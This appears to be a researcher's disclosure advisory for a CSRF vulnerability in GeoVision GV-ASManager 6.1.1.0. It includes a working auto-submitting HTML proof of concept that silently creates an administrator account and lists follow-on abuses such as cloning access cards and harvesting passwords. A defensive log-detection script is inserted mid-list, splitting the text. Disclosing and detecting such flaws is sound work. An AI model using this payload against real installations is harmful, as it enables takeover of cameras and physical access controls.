CVE-2024-56901 - A Cross-Site Request Forgery (CSRF) vulnerability in the GeoVision GV-ASManager web application, version 6.1.1.0 and earlier, allows attackers to arbitrarily create Admin accounts via a crafted GET request. This vulnerability is chained with CVE-2024-56903 for a successful CSRF attack.
To perform a successful attack, an attacker requires:
- GeoVision GV-ASManager version 6.1.1.0 or earlier
- Network access to the GV-ASManager web application (in some deployments the application is exposed publicly)
- An administrator's interaction while an authenticated session is open in their browser
The vulnerability can be leveraged to perform the following unauthorized actions:
- An unauthorized user is able to:
  - Change the request method from POST to GET by leveraging the CVE-2024-56903 vulnerability.
  - Craft a malicious HTML page that makes changes in the application on behalf of the administrator account.
  - Create a new administrator account on behalf of the legitimate administrator account.
- After a successful attack, the attacker will be able to:
  - Access resources such as monitoring cameras, access cards, parking, employees and visitors, etc.
  - Make changes to data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
  - Disrupt and disconnect services such as monitoring cameras and access controls.
  - Clone and duplicate access control data for further attack scenarios.
  - Perform the CVE-2024-56902 attack to retrieve cleartext passwords that can be reused against other digital assets of the organization.
Account list before the attack starts
By default, a new account is created with a POST request; we need to change the request method to GET.
Changing the request method from POST to GET
Generating the CSRF attack code to create a new administrator account named Malicious
Crafting an HTML page which, if triggered by an administrator with an open session, creates a new administrator account named Malicious:
<html>
<body>
<form action="https://192.168.50.129/ASWeb/bin/ASWebCommon.srf">
<input type="hidden" name="action" value="UA_SetCreateAccount" />
<input type="hidden" name="id" value="Malicious" />
<input type="hidden" name="password" value="Youarecracked999!" />
<input type="hidden" name="email" value="Malicious@geovision.com.tw" />
<input type="hidden" name="level" value="2" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
While the administrator is logged in to the web application, triggering the CSRF code automatically creates the new Malicious administrator account.
The Malicious administrator account has been created.
The Malicious administrator account logs in with full privileges.
It is worth noting that, through this attack, the Malicious user gains administrative privileges in the following applications:
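A defender-side check for this chain, added here as an example and not part of the original advisory: the CSRF page above only works because the account-creation action is accepted over GET, so a GET to the ASWebCommon.srf endpoint carrying action=UA_SetCreateAccount in the web server's access log is a strong indicator of this attack. The log lines, the read-only action name UA_Status and the log format are constructed assumptions; the endpoint, action and level=2 values come from the PoC.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/ASWeb/bin/ASWebCommon.srf"        # endpoint used by the advisory's PoC
CREATE_ACCOUNT_ACTION = "UA_SetCreateAccount"  # state-changing action from the PoC
ADMIN_LEVEL = "2"                              # level value the PoC uses for an admin account

# Common Log Format: client - user [timestamp] "METHOD target HTTP/x" status bytes (assumed format)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log; "UA_Status" is a hypothetical read-only action, not a real one.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2025:10:01:02 +0000] "POST /ASWeb/bin/ASWebCommon.srf HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2025:10:02:15 +0000] "GET /ASWeb/bin/ASWebCommon.srf?action=UA_Status HTTP/1.1" 200 64
10.0.0.9 - - [10/Jan/2025:10:03:44 +0000] "GET /ASWeb/bin/ASWebCommon.srf?action=UA_SetCreateAccount&id=Malicious&password=REDACTED&email=x%40example.com&level=2 HTTP/1.1" 200 128
"""

def parse_line(line):
    """Parse one access-log line into a dict (path and query params split out), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["params"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec

def is_csrf_account_creation(rec):
    """True when the account-creation action arrives over GET: the POST-to-GET
    downgrade that makes the CSRF form in this advisory possible."""
    return (rec["method"] == "GET" and rec["path"] == ENDPOINT
            and rec["params"].get("action") == CREATE_ACCOUNT_ACTION)

def find_suspicious(log_text):
    """Return one finding per matching line; the submitted password is never echoed."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_csrf_account_creation(rec):
            findings.append({
                "ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                "new_account": rec["params"].get("id"),
                "admin": rec["params"].get("level") == ADMIN_LEVEL,
            })
    return findings
```

The same predicate applied server-side (reject GET for UA_SetCreateAccount) is the minimal hardening; the vendor fix in 6.1.2.0 is the real remedy.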
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in the OS
The vendor of the product, GeoVision, has been informed and has already released the fixed version 6.1.2.0 (as of January 2025).
Download the latest version from here
If you have a question, you can contact me, Giorgi Dograshvili, on LinkedIn.